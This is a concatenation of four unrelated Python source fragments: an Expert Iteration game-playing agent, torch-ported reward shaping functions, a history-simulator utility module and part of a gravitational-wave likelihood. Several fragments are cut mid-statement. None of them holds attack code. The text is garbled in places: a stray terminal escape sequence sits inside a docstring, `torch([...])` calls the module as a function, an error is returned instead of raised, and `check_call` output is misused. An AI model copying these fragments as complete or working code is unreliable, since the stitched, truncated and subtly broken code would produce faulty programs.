# Use episodic return for all points
for _ in range(len(storage.s)): storage.add({'V': r})
def model_based_take_action(self, env: Union[gym.Env, List[gym.Env]],
observation, player_index: int, multi_action: bool):
action = self.expert.model_based_take_action(env, observation,
player_index,
multi_action)
self.current_prediction = self.expert.current_prediction
return action
def model_free_take_action(self, state, legal_actions: List[int], multi_action: bool = False):
if self.training: raise RuntimeError('ExpertIterationAgent.model_free_take_action() cannot be called when training is True')
prediction = self.apprentice(self.state_preprocess_fn(state),
legal_actions=legal_actions)
return prediction['a']
def start_server(self, num_connections: int):
''' Explain that this is needed because different MCTS experts need to send requests '''
if num_connections == -1: num_connections = multiprocessing.cpu_count()
self.expert.server_handler = NeuralNetServerHandler(
num_connections=num_connections,
net=self.apprentice,
preprocess_fn=self.server_state_preprocess_fn
)
def close_server(self):
self.expert.close_server()
@torch.no_grad()
def policy_fn(self, observation, legal_actions, self_player_index: int = None, requested_player_index: int = None):
processed_obs = self.state_preprocess_fn(observation)
return self.apprentice(processed_obs, legal_actions=legal_actions)['probs'].squeeze(0).numpy()
@torch.no_grad()
def evaluation_fn(self, observation, legal_actions):
processed_obs = self.state_preprocess_fn(observation)
return self.apprentice(processed_obs, legal_actions=legal_actions)['V'].squeeze(0).numpy()
def clone(self):
raise NotImplementedError('Cloning ExpertIterationAgent not supported')
def __repr__(self):
basic_stats = f'Name: {self.name}\nRequires access to other agents: {self.requires_acess_to_other_agents}\n'
agent_stats = (f'Agent modelling: {self.use_agent_modelling}\n'
f'Use apprentice in expert: {self.use_apprentice_in_expert}\n'
f'Use agent mdelling in mcts: {self.use_true_agent_models_in_mcts}\n'
f'Use learnt opponent models in mcts: {self.use_learnt_opponent_models_in_mcts}\n'
f'Average episode returns with MCTS values: {self.average_episode_returns_with_mcts_values}\n'
f'State processing fn: {self.state_preprocess_fn}\n'
f'Server based State processing fn: {self.server_state_preprocess_fn}'
)
agent = f"Agent:\n{textwrap.indent(str(agent_stats), ' ')}\n"
expert = f"Expert:\n{textwrap.indent(str(self.expert), ' ')}\n"
algorithm = f"Algorithm:\n{textwrap.indent(str(self.algorithm), ' ')}"
return basic_stats + agent + expert + algorithm
#####
# This is a dirty HACK but oh well...
@staticmethod
def opponent_aware_server_based_policy_fn(observation,
legal_actions: List[int],
self_player_index: int,
requested_player_index: int,
connection: Connection,
opponent_connection: Connection) -> np.ndarray:
key = 'probs'
target_connection = connection if requested_player_index == self_player_index else opponent_connection
return request_prediction_from_server(
observation, legal_actions, target_connection, key)
@staticmethod
def learnt_opponent_model_aware_server_based_policy_fn(observation,
legal_actions: List[int],
self_player_index: int,
requested_player_index: int,
connection: Connection) -> np.ndarray:
key = 'probs' if requested_player_index == self_player_index else 'policy_0'
return request_prediction_from_server(
observation, legal_actions, connection, key)
#
####
def choose_feature_extractor(task, config: Dict):
if config['feature_extractor_arch'] == 'CNN':
model = Convolutional2DBody(input_shape=config['preprocessed_input_dimensions'],
channels=config['channels'],
kernel_sizes=config['kernel_sizes'],
paddings=config['paddings'],
strides=config['strides'],
final_feature_dim=config['final_feature_dim'],
residual_connections=config.get('residual_connections', []),
use_batch_normalization=config['use_batch_normalization'])
return model
else:
return ValueError('Only convolutional architectures are supported for ExpertIterationAgent')
def build_apprentice_model(task, config: Dict) -> nn.Module:
if task.action_type == 'Continuous':
raise ValueError(f'Only Discrete action type tasks are supported. Task {task.name} has a Continuous action_type')
feature_extractor = choose_feature_extractor(task, config)
# REFACTORING: maybe we can refactor into its own function, figure out
# figure out how to do proper separation of agent modell and not.
if config['use_agent_modelling']:
return build_apprentice_with_agent_modelling(
feature_extractor, task, config)
else:
return build_apprentice_no_agent_modelling(feature_extractor, config, task)
def build_apprentice_no_agent_modelling(feature_extractor, config, task) -> nn.Module:
default_embedding_size = [64, 64]
body = FCBody(
state_dim=feature_extractor.feature_dim,
hidden_units=config.get(
'post_feature_extractor_hidden_units',
default_embedding_size
)
)
feature_and_body = SequentialBody([feature_extractor, body])
critic_gate_fn = parse_gating_fn(config.get('critic_gate_fn', None))
return CategoricalActorCriticNet(state_dim=feature_and_body.feature_dim,
action_dim=task.action_dim,
critic_gate_fn=critic_gate_fn,
body=feature_and_body)
def build_apprentice_with_agent_modelling(feature_extractor, task, config):
default_embedding_size = [64]
policy_inference_body = FCBody(
feature_extractor.feature_dim,
hidden_units=config.get(
'post_feature_extractor_policy_inference_hidden_units',
default_embedding_size
)
)
actor_critic_body = FCBody(
feature_extractor.feature_dim,
hidden_units=config.get(
'post_feature_extractor_actor_critic_hidden_units',
default_embedding_size
)
)
# We model all agents but ourselves
num_agents_to_model = task.num_agents - 1
if not isinstance(task.action_dim, (int, float)):
raise ValueError('number of actions must be an integer (1D)')
return PolicyInferenceActorCriticNet(feature_extractor=feature_extractor,
num_policies=num_agents_to_model,
num_actions=task.action_dim,
policy_inference_body=policy_inference_body,
actor_critic_body=actor_critic_body)
def build_expert(task, config: Dict, expert_name: str) -> MCTSAgent:
selection_phase = 'puct' if config['use_apprentice_in_expert'] else 'ucb1'
exploration = f'exploration_factor_{selection_phase}'
expert_config = {
'budget': config['mcts_budget'],
'rollout_budget': config.get('mcts_rollout_budget', 0.),
'selection_phase': selection_phase,
'use_dirichlet': config.get('mcts_use_dirichlet', False),
exploration: config['mcts_exploration_factor'],
'dirichlet_alpha': config['mcts_dirichlet_alpha'],
'dirichlet_strength': config.get('mcts_dirichlet_strength', 1.)
}
return build_MCTS_Agent(task, expert_config, agent_name=expert_name)
def check_parameter_validity(task: 'Task', config: Dict[str, Any]):
''' Checks whether :param: config is compatible with :param: task '''
if config.get('use_agent_modelling', False) and task.num_agents != 2:
raise NotImplementedError('ExpertIterationAgent with agent modelling '
'is only supported with tasks with 2 agents '
'(one agent is this ExpertIterationAgent and the other '
f'will be the opponent). Given task {task.name} '
f'features {task.num_agents} agents.')
if (config.get('use_learnt_opponent_models_in_mcts', False) and
config.get('use_true_agent_models_in_mcts', False)):
raise ValueError("Both flags 'use_true_agent_models_in_mcts' and "
"'use_learnt_opponent_models_in_mcts' were set, which "
"is conflicting. One represents "
"using true opponent models inside of MCTS, the other "
"using learnt opponent models. Read build_ExpertIteration_Agent "
"documentation for further info."
)
def generate_preprocessing_functions(config) -> Tuple[Callable, Callable]:
if 'state_preprocessing_fn' in config:
state_preprocess_fn = parse_preprocessing_fn(
config['state_preprocessing_fn'])
else: state_preprocess_fn = None
if 'server_state_preprocessing_fn' in config:
server_state_preprocess_fn = parse_preprocessing_fn(
config['server_state_preprocessing_fn'])
else: server_state_preprocess_fn = None
return state_preprocess_fn, server_state_preprocess_fn
def build_ExpertIteration_Agent(task: 'Task',
config: Dict[str, Any],
agent_name: str = 'ExIt') -> ExpertIterationAgent:
'''
TODO: Check all params to make sure they are up to date
:param task: Environment specific configuration
:param agent_name: String identifier for the agent
:param config: Dict contain hyperparameters for the ExpertIterationAgent:
Higher level params:
- 'use_apprentice_in_expert': (Bool) whether to bias MCTS's selection
phase and expansion phase with the apprentice.
If False, Expert Iteration becomes the
DAGGER algorithm:
https://www.cs.cmu.edu/~sross1/publications/Ross-AIStats11-NoRegret.pdf
If True, PUCT will be used as a selection
strategy in MCTS, otherwise UCB1 will be used
- 'use_agent_modelling': (Bool) Whether to model other agent's actions
as an axuliary task. As in DPIQN paper
- 'use_true_agent_models_in_mcts': (Bool) Whether to use true agent models
to compute priors for MCTS nodes.
- 'use_learnt_opponent_models_in_mcts': (Bool) Whether to use learnt agent models
to compute priors for MCTS nodes.
- 'request_observed_action': Whether to observe one hot encoded actions, otherwise full policy will be requested.
Only meaningful when :param: use_agent_modelling is set.
- 'average_episode_returns_with_mcts_values': (Bool) Whether to average
the episode returns with Q values of MCTS' root
node, to serve as targets for the apprentice's
value head. Idea taken from: https://medium.com/oracledevs/lessons-from-alphazero-part-4-improving-the-training-target-6efba2e71628
MCTS params:
- 'mcts_budget': (Int) Number of iterations of the MCTS loop that will be carried
out before an action is selected.
- 'mcts_rollout_budget': (Int) Number of steps to simulate during
rollout_phase
- 'mcts_exploration_factor': (Float) PUCT exploration constant
- 'mcts_use_dirichlet': (Bool) Whether to add dirichlet noise to the
MCTS rootnode's action probabilities (see PUCT)
- 'mcts_dirichlet_alpha': Parameter of Dirichlet distribution
- 'temperature': Value by which MCTS child visitations will be
inversely exponentiated to (N^(1/temperature))
- 'drop_temperature_after_n_moves': Number of moves after which
temperature parameter will dropped
to a very small value (around 0.01)
(Collected) Dataset params:
- 'initial_max_generations_in_memory': (Int) Initial number of generations to be allowed
in replay buffer
- 'increase_memory_every_n_generations': (Int) Number of iterations to elapse before increasing dataset size.
- 'memory_increase_step': Number of extra generations to allow in the
algorithm's dataset everytime the dataset's
capacity increases, as dictated by
:param: increase_memory_every_n_generations
- 'final_max_generations_in_memory': (Int) Ceiling on the size of replay buffer
- 'num_epochs_per_iteration': (Int) Training epochs to over the game dataset per iteration
- 'num_games_per_iteration': (Int) Number of episodes to collect before doing a training
- 'batch_size': (Int) Minibatch size used during training
Neural Network params:
- 'learning_rate': (Float) Learning rate for neural network optimizer
- 'feature_extractor_arch': (str) Architechture for the feature extractor
+ For Convolutional2DBody:
- 'residual_connections': List[Tuple[int, int]] Which layers should hace residual skip connections
- 'preprocessed_input_dimensions': Tuple[int] Input dimensions for each channel
- 'channels': Tuple[int]
- 'kernel_sizes': Tuple[int]
- 'paddings': Tuple[int]
- 'final_feature_dim': int. Dimensionality of the final, fully connected layer of a convolutional body
- 'critic_gate_fn': Gating function to be applied to critic's
output head. Supported: ['None', 'tanh']
'''
check_parameter_validity(task, config)
apprentice = build_apprentice_model(task, config)
expert = build_expert(task, config, expert_name=f'Expert:{agent_name}')
(state_preprocess_fn, server_state_preprocess_fn) = \
generate_preprocessing_functions(config)
data_augmnentation_fn = parse_data_augmentation_fn(config['data_augmnentation_fn']) \
if 'data_augmnentation_fn' in config else None
algorithm | |
<reponame>MaxSobolMark/mbrl-lib
"""A set of reward utilities written by the authors of dm_control
Copied from Meta-World repo, branch new-reward-functions.
Modified to use Tensorflow instead of Numpy"""
import numpy as np
import torch
# The value returned by tolerance() at `margin` distance from `bounds` interval.
_DEFAULT_VALUE_AT_MARGIN = 0.1
def _sigmoids(x, value_at_1, sigmoid):
"""Returns 1 when `x` == 0, between 0 and 1 otherwise.
Args:
x: A scalar or numpy array.
value_at_1: A float between 0 and 1 specifying the output when `x` == 1.
sigmoid: String, choice of sigmoid type.
Returns:
A numpy array with values between 0.0 and 1.0.
Raises:
ValueError: If not 0 < `value_at_1` < 1, except for `linear`, `cosine` and
`quadratic` sigmoids which allow `value_at_1` == 0.
ValueError: If `sigmoid` is of an unknown type.
"""
if sigmoid in ('cosine', 'linear', 'quadratic'):
if not 0 <= value_at_1 < 1:
raise ValueError(
'`value_at_1` must be nonnegative and smaller than 1, '
'got {}.'.format(value_at_1))
else:
if not 0 < value_at_1 < 1:
raise ValueError('`value_at_1` must be strictly between 0 and 1, '
'got {}.'.format(value_at_1))
if sigmoid == 'gaussian':
scale = np.sqrt(-2 * np.log(value_at_1))
return torch.exp(-0.5 * (x * scale)**2)
elif sigmoid == 'hyperbolic':
scale = np.arccosh(1 / value_at_1)
return 1 / np.cosh(x * scale)
elif sigmoid == 'long_tail':
scale = np.sqrt(1 / value_at_1 - 1)
return 1 / ((x * scale)**2 + 1)
elif sigmoid == 'reciprocal':
scale = 1 / value_at_1 - 1
return 1 / (abs(x) * scale + 1)
elif sigmoid == 'cosine':
scale = np.arccos(2 * value_at_1 - 1) / np.pi
scaled_x = x * scale
return np.where(
abs(scaled_x) < 1, (1 + np.cos(np.pi * scaled_x)) / 2, 0.0)
elif sigmoid == 'linear':
scale = 1 - value_at_1
scaled_x = x * scale
return np.where(abs(scaled_x) < 1, 1 - scaled_x, 0.0)
elif sigmoid == 'quadratic':
scale = np.sqrt(1 - value_at_1)
scaled_x = x * scale
return np.where(abs(scaled_x) < 1, 1 - scaled_x**2, 0.0)
elif sigmoid == 'tanh_squared':
scale = np.arctanh(np.sqrt(1 - value_at_1))
return 1 - np.tanh(x * scale)**2
else:
raise ValueError('Unknown sigmoid type {!r}.'.format(sigmoid))
def tolerance(x,
bounds=(0.0, 0.0),
margin=0.0,
sigmoid='gaussian',
value_at_margin=_DEFAULT_VALUE_AT_MARGIN,
device: str = 'cpu'):
"""Returns 1 when `x` falls inside the bounds, between 0 and 1 otherwise.
Args:
x: A scalar or numpy array.
bounds: A tuple of floats specifying inclusive `(lower, upper)` bounds for
the target interval. These can be infinite if the interval is unbounded
at one or both ends, or they can be equal to one another if the target
value is exact.
margin: Float. Parameter that controls how steeply the output decreases as
`x` moves out-of-bounds.
* If `margin == 0` then the output will be 0 for all values of `x`
outside of `bounds`.
* If `margin > 0` then the output will decrease sigmoidally with
increasing distance from the nearest bound.
sigmoid: String, choice of sigmoid type. Valid values are: 'gaussian',
'linear', 'hyperbolic', 'long_tail', 'cosine', 'tanh_squared'.
value_at_margin: A float between 0 and 1 specifying the output value when
the distance from `x` to the nearest bound is equal to `margin`. Ignored
if `margin == 0`.
Returns:
A float or numpy array with values between 0.0 and 1.0.
Raises:
ValueError: If `bounds[0] > bounds[1]`.
ValueError: If `margin` is negative.
"""
lower, upper = bounds
if lower > upper:
raise ValueError(
f'Lower bound must be <= upper bound. Lower: {lower}; upper: {upper}'
)
# if margin < 0.:
# print('margin: ', margin)
# print('numpy: ', margin.numpy())
# raise ValueError('`margin` must be non-negative. Current value: {}'.format(margin))
in_bounds = torch.logical_and(lower <= x, x <= upper)
d = torch.divide(
torch.where(x < lower, lower - x, x - upper),
#tf.cast(margin, tf.float32))
margin)
value = torch.where(
(margin == 0).to(device),
torch.where(in_bounds, 1.0, 0.0).to(device),
torch.where(in_bounds.to(device),
torch.Tensor([1.0]).to(device),
_sigmoids(d, value_at_margin,
sigmoid).to(device)).to(device))
return float(value) if x.shape == () else value
def inverse_tolerance(x, bounds=(0.0, 0.0), margin=0.0, sigmoid='reciprocal'):
"""Returns 0 when `x` falls inside the bounds, betw[<0;34;31M]een 1 and 0 otherwise.
Args:
x: A scalar or numpy array.
bounds: A tuple of floats specifying inclusive `(lower, upper)` bounds for
the target interval. These can be infinite if the interval is unbounded
at one or both ends, or they can be equal to one another if the target
value is exact.
margin: Float. Parameter that controls how steeply the output decreases as
`x` moves out-of-bounds.
* If `margin == 0` then the output will be 0 for all values of `x`
outside of `bounds`.
* If `margin > 0` then the output will decrease sigmoidally with
increasing distance from the nearest bound.
sigmoid: String, choice of sigmoid type. Valid values are: 'gaussian',
'linear', 'hyperbolic', 'long_tail', 'cosine', 'tanh_squared'.
value_at_margin: A float between 0 and 1 specifying the output value when
the distance from `x` to the nearest bound is equal to `margin`. Ignored
if `margin == 0`.
Returns:
A float or numpy array with values between 0.0 and 1.0.
Raises:
ValueError: If `bounds[0] > bounds[1]`.
ValueError: If `margin` is negative.
"""
bound = tolerance(x,
bounds=bounds,
margin=margin,
sigmoid=sigmoid,
value_at_margin=0)
return 1 - bound
def rect_prism_tolerance(curr, zero, one):
"""Computes a reward if curr is inside a rectangluar prism region.
The 3d points curr and zero specify 2 diagonal corners of a rectangular
prism that represents the decreasing region.
one represents the corner of the prism that has a reward of 1.
zero represents the diagonal opposite corner of the prism that has a reward
of 0.
Curr is the point that the prism reward region is being applied for.
Args:
curr(np.ndarray): The point who's reward is being assessed.
shape is (3,).
zero(np.ndarray): One corner of the rectangular prism, with reward 0.
shape is (3,)
one(np.ndarray): The diagonal opposite corner of one, with reward 1.
shape is (3,)
"""
in_range = lambda a, b, c: float(b <= a <= c) if c >= b else float(c <= a
<= b)
in_prism = (in_range(curr[0], zero[0], one[0])
and in_range(curr[1], zero[1], one[1])
and in_range(curr[2], zero[2], one[2]))
if in_prism:
diff = one - zero
x_scale = (curr[0] - zero[0]) / diff[0]
y_scale = (curr[1] - zero[1]) / diff[1]
z_scale = (curr[2] - zero[2]) / diff[2]
return x_scale * y_scale * z_scale
# return 0.01
else:
return 1.
def hamacher_product(a: torch.Tensor, b: torch.Tensor,
device: str) -> torch.Tensor:
"""The element-wise hamacher (t-norm) product of a and b.
computes (a * b) / ((a + b) - (a * b))
Args:
a (tf.Tensor): Shape: [n] 1st term of hamacher product.
b (tf.Tensor): Shape: [n] 2nd term of hamacher product.
Raises:
ValueError: a and b must range between 0 and 1
Returns:
tf.Tensor: The element-wise hamacher product of a and b.
"""
# if not ((0. <= a <= 1.) and (0. <= b <= 1.)):
# raise ValueError("a and b must range between 0 and 1")
# a_times_b = tf.multiply(a, b) # Element-wise
a_times_b = a * b # Element-wise
denominator = a + b - a_times_b
h_prod = torch.where(denominator > 0, torch.divide(a_times_b, denominator),
torch.zeros(1).to(device))
# assert 0. <= h_prod <= 1.
return h_prod
def _reward_pos(obs: torch.Tensor, goal_position: torch.Tensor,
device: str) -> torch.Tensor:
"""Modified version of _reward_pos that doesn't require theta.
Args:
obs (tf.Tensor): Shape: [n, obs_dims]
goal_position (tf.Tensor): [n, goal_dims]
Returns:
[type]: [description]
"""
hand = obs[:, :3]
door = obs[:, 4:7] + torch([-0.05, 0, 0])
threshold = 0.12
# floor is a 3D funnel centered on the door handle
radius = torch.norm(hand[:, :2] - door[:, :2], dim=-1)
floor = torch.where(condition=radius <= threshold,
x=0.0,
y=0.04 * torch.log(radius - threshold) + 0.4)
# if radius <= threshold:
# floor = 0.0
# else:
# floor = 0.04 * tf.math.log(radius - threshold) + 0.4
# prevent the hand from running into the handle prematurely by keeping
# it above the "floor"
above_floor = torch.where(condition=hand[:, 2] >= floor,
x=1.0,
y=tolerance(
floor - hand[:, 2],
bounds=(0.0, 0.01),
margin=torch.maximum(
floor / 2.0,
torch.broadcast_to(0.0, floor.shape)),
sigmoid='long_tail',
))
# above_floor = 1.0 if hand[2] >= floor else tolerance(
# floor - hand[2],
# bounds=(0.0, 0.01),
# margin=tf.math.maximum(floor / | |
<filename>history_generator/internal/utility.py
import random
import shlex
import struct
import subprocess
import time
from functools import reduce
from tkinter import font
from math import *
import sys
import platform
import os
START_BATTLES_MINIMIZED = False
S_WIDTH = 1000
S_HEIGHT = 1000
DISPLAY_WIDTH = 1280
DISPLAY_HEIGHT = 720
CELL_SIZE = 6 # cells are squares, this is the side length
SCROLL_SPEED = CELL_SIZE
def sum_dict(d):
total = 0
for k in d:
total += d[k]
return total
def listbox_capacity(listbox):
new_font = font.Font(listbox, listbox['font'])
return listbox.winfo_height() / new_font.metrics()['ascent']
def count(l):
res = {}
for i in l:
if i in res:
res[i] += 1
else:
res[i] = 1
return res
def tuplize(l):
res = l
for i in range(len(res)):
if isinstance(res[i], list):
res[i] = tuplize(res[i])
return tuple(res)
def get_time_span_length(start_date, end_date):
year_dif, month_dif, day_dif = end_date[0] - start_date[0], end_date[1] - start_date[1], end_date[2] - start_date[2]
if day_dif < 0:
month_dif -= 1
day_dif += 30
if month_dif < 0:
year_dif -= 1
month_dif += 12
return year_dif, month_dif, day_dif
def get_container(s, start, end, start_pos):
level = 1
i = start_pos
while i < len(s):
if s[i] == start:
level += 1
elif s[i] == end:
level -= 1
if level == 0:
break
i += 1
return s[start_pos:i]
def find_container_of(s, start, end, char):
# Start here, and go back until we find the starting bracket
level = 0
start_pos = 0
while start_pos < len(s):
if s[start_pos] == start:
level += 1
elif s[start_pos] == end:
level -= 1
elif s[start_pos] == char and level == 1:
break
start_pos += 1
if start_pos >= len(s) - 1:
raise Exception('\'{}\' not found in {}.'.format(char, s))
while start_pos > 0:
if s[start_pos] == end:
level += 1
elif s[start_pos] == start:
level -= 1
if level == 0:
break
start_pos -= 1
level = 1
end_pos = start_pos + 1
while end_pos < len(s):
if s[end_pos] == start:
level += 1
elif s[end_pos] == end:
level -= 1
if level == 0:
break
end_pos += 1
return start_pos, end_pos
# So that if an inner section is detected, its entire contents are ignored
# For example, separate_container('<test|test1>|test2', '<', '>', '|') will return ['<test|test1>', 'test2']
def separate_container(s, start, end, char):
result = []
level = 0
i = 0
while len(s) > 0 and i < len(s):
if s[i] == char and level == 0:
result.append(s[:i])
s = s[i + 1:]
i = 0
else:
if s[i] == start:
level += 1
elif s[i] == end:
level -= 1
i += 1
if len(s) > 0:
result.append(s)
return result
def titlecase(s):
new_words = []
for word in s.split():
if not word in ['of', 'by', 'a', 'the']:
word = word[0].upper() + word[1:]
new_words.append(word)
# First word is always capitalized
if len(new_words) > 0 and len(new_words[0]) > 0:
new_words[0] = new_words[0][0].upper() + new_words[0][1:]
return ' '.join(new_words)
def capitalize_first_letter(s):
return s[0].upper() + s[1:]
def displayify_text(s):
return ' '.join(list(map(capitalize_first_letter, s.split('_'))))
def base_war_stats():
base = {}
base['troops_lost'] = 0
base['troops_killed'] = 0
return base
def base_stats():
base = {}
base['troops'] = 0
base['troops_lost'] = 0
base['troops_killed'] = 0
base['projectiles_launched'] = 0
base['projectiles_hit'] = 0
base['attacks_won'] = 0
return base
def base_soldier_stats():
base = {}
base['attacks'] = 0
base['attacks_won'] = 0
base['kills'] = 0
base['deaths'] = 0
base['projectiles_launched'] = 0
base['projectiles_hit'] = 0
return base
def base_weapon_stats():
base = {}
base['attacks'] = 0
base['attacks_won'] = 0
base['kills'] = 0
return base
def show_dict(d, depth=1, recurse=True, gen=None):
for stat, v in sorted(d.items()):
if isinstance(v, dict):
if recurse:
if gen is not None:
gen.write_to_gen_log('{}{}:'.format('\t' * depth, displayify_text(stat)))
else:
print('{}{}:'.format('\t' * depth, displayify_text(stat)))
show_dict(v, depth=depth + 1, recurse=recurse, gen=gen)
else:
if gen is not None:
gen.write_to_gen_log('{}{}: {}'.format('\t' * depth, displayify_text(stat), v))
else:
print('{}{}: {}'.format('\t' * depth, displayify_text(stat), v))
def fst(t):
return t[0]
def snd(t):
return t[1]
# Finds the corresponding keys in a dictionary and applies the function to both, creating a new dictionary
# f_single is used if the key appears in only one of the dictionaries
def zip_dict_with(f, a, b, f_single=None):
res = {}
for k in a:
if k in b:
res[k] = f(a[k], b[k])
else:
if f_single is not None:
res[k] = f_single(a[k])
if f_single is not None:
for k in b:
if not k in res:
res[k] = f_single(b[k])
return res
def get_nearest_enemy(unit, check, check_unit=None):
min_distance = 1000000000
target = None
for i in check:
d = distance_squared((unit.x, unit.y), (i.x, i.y))
if d < min_distance:
target = i
min_distance = d
return target
def rgb_color(r, g, b):
return '#{}{}{}'.format(hex(r)[2:].ljust(2, '0'), hex(g)[2:].ljust(2, '0'), hex(b)[2:].ljust(2, '0'))
def flatten(l):
return [i for xs in l for i in xs]
# From https://gist.github.com/jtriley/1108174
def get_terminal_size():
""" getTerminalSize()
- get width and height of console
- works on linux,os x,windows,cygwin(windows)
originally retrieved from:
http://stackoverflow.com/questions/566746/how-to-get-console-window-width-in-python
"""
current_os = platform.system()
tuple_xy = None
if current_os == 'Windows':
tuple_xy = _get_terminal_size_windows()
if tuple_xy is None:
tuple_xy = _get_terminal_size_tput()
# needed for window's python in cygwin's xterm!
if current_os in ['Linux', 'Darwin'] or current_os.startswith('CYGWIN'):
tuple_xy = _get_terminal_size_linux()
if tuple_xy is None:
tuple_xy = (80, 25) # default value
return tuple_xy
def _get_terminal_size_windows():
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom,
maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
except:
pass
def _get_terminal_size_tput():
# get terminal width
# src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
try:
cols = int(subprocess.check_call(shlex.split('tput cols')))
rows = int(subprocess.check_call(shlex.split('tput lines')))
return (cols, rows)
except:
pass
def _get_terminal_size_linux():
def ioctl_GWINSZ(fd):
try:
import fcntl
import termios
cr = struct.unpack('hh',
fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
return cr
except:
pass
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
try:
cr = (os.environ['LINES'], os.environ['COLUMNS'])
except:
return None
return int(cr[1]), int(cr[0])
terminal_width = -1
def show_bar(i, total, start_time=None, width=80, message='', number_limit=False):
global terminal_width
if terminal_width == -1:
terminal_width, _ = get_terminal_size()
terminal_width -= 1
if terminal_width != -1:
width = terminal_width
if isinstance(total, int) or isinstance(total, float):
number_limit = True
# Because we start counting at 0
i += 1
# Just to make sure we don't get a ridiculously long bar
i = min(total, i)
time_message = ''
if start_time is not None:
elapsed = time.time() - start_time
if number_limit:
estimated_remaining = elapsed / float(i) * float(total - i)
else:
estimated_remaining = elapsed / float(i) * float(len(total) - i)
time_message = '{} seconds. '.format(round(estimated_remaining))
message += time_message
# The 2 is because of the []
if not number_limit:
bar_chunks = int(float(i) / float(len(total)) * (width - len(message) - 2))
else:
bar_chunks = int(float(i) / float(total) * (width - len(message) - 2))
sys.stdout.write(
'\r{}'.format(message) + '[{}{}]'.format('=' * bar_chunks, ' ' * (width - bar_chunks - len(message) - 2)))
sys.stdout.flush()
def calculate_interception(v_e, v_p, e, p, theta_e):
(x_e, y_e) = e
(x_p, y_p) = p
t1 = -(v_e * x_e * cos(theta_e) - v_e * x_p * cos(theta_e) + v_e * y_e * sin(theta_e) - v_e * y_p * sin(
theta_e) + sqrt(-(v_e ** 2 * sin(theta_e) ** 2 - v_p ** 2) * x_e ** 2 + 2 * (
v_e ** 2 * sin(theta_e) ** 2 - v_p ** 2) * x_e * x_p - (
v_e ** 2 * sin(theta_e) ** 2 - v_p ** 2) * x_p ** 2 - (
v_e ** 2 * cos(theta_e) ** 2 - v_p ** 2) * y_e ** 2 - (
v_e ** 2 * cos(theta_e) ** 2 - v_p ** 2) * y_p ** 2 + 2 * (
v_e ** 2 * x_e * cos(theta_e) * sin(theta_e) - v_e ** 2 * x_p * cos(theta_e) * sin(
theta_e)) * y_e - 2 * (
v_e ** 2 * x_e * cos(theta_e) * sin(theta_e) - v_e ** 2 * x_p * cos(theta_e) * sin(
theta_e) - (v_e ** 2 * cos(theta_e) ** 2 - v_p ** 2) * y_e) * y_p)) / (
(cos(theta_e) ** 2 + sin(theta_e) ** 2) * | |
=\
self.waveform_generator.frequency_domain_strain(self.parameters)
self.parameters.update(self.get_sky_frame_parameters())
if waveform_polarizations is None:
return np.nan_to_num(-np.inf)
d_inner_h = 0.
optimal_snr_squared = 0.
complex_matched_filter_snr = 0.
if self.time_marginalization and self.calibration_marginalization:
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
d_inner_h_array = np.zeros(
(self.number_of_response_curves, len(self.interferometers.frequency_array[0:-1])),
dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
elif self.time_marginalization:
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
d_inner_h_array = np.zeros(
len(self.interferometers.frequency_array[0:-1]),
dtype=np.complex128)
elif self.calibration_marginalization:
d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
waveform_polarizations=waveform_polarizations,
interferometer=interferometer)
d_inner_h += per_detector_snr.d_inner_h
optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
if self.time_marginalization or self.calibration_marginalization:
d_inner_h_array += per_detector_snr.d_inner_h_array
if self.calibration_marginalization:
optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
if self.calibration_marginalization and self.time_marginalization:
log_l = self.time_and_calibration_marginalized_likelihood(
d_inner_h_array=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
if self.jitter_time:
self.parameters['geocent_time'] -= self.parameters['time_jitter']
elif self.calibration_marginalization:
log_l = self.calibration_marginalized_likelihood(
d_inner_h_calibration_array=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
elif self.time_marginalization:
log_l = self.time_marginalized_likelihood(
d_inner_h_tc_array=d_inner_h_array,
h_inner_h=optimal_snr_squared)
if self.jitter_time:
self.parameters['geocent_time'] -= self.parameters['time_jitter']
elif self.distance_marginalization:
log_l = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
elif self.phase_marginalization:
log_l = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
else:
log_l = np.real(d_inner_h) - optimal_snr_squared / 2
return float(log_l.real)
def generate_posterior_sample_from_marginalized_likelihood(self):
"""
Reconstruct the distance posterior from a run which used a likelihood
which explicitly marginalised over time/distance/phase.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Returns
=======
sample: dict
Returns the parameters with new samples.
Notes
=====
This involves a deepcopy of the signal to avoid issues with waveform
caching, as the signal is overwritten in place.
"""
if any([self.phase_marginalization, self.distance_marginalization,
self.time_marginalization, self.calibration_marginalization]):
signal_polarizations = copy.deepcopy(
self.waveform_generator.frequency_domain_strain(
self.parameters))
else:
return self.parameters
if self.calibration_marginalization and self.time_marginalization:
raise AttributeError(
"Cannot use time and calibration marginalization simultaneously for regeneration at the moment!"
"The matrix manipulation has not been tested.")
if self.calibration_marginalization:
new_calibration = self.generate_calibration_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['recalib_index'] = new_calibration
if self.time_marginalization:
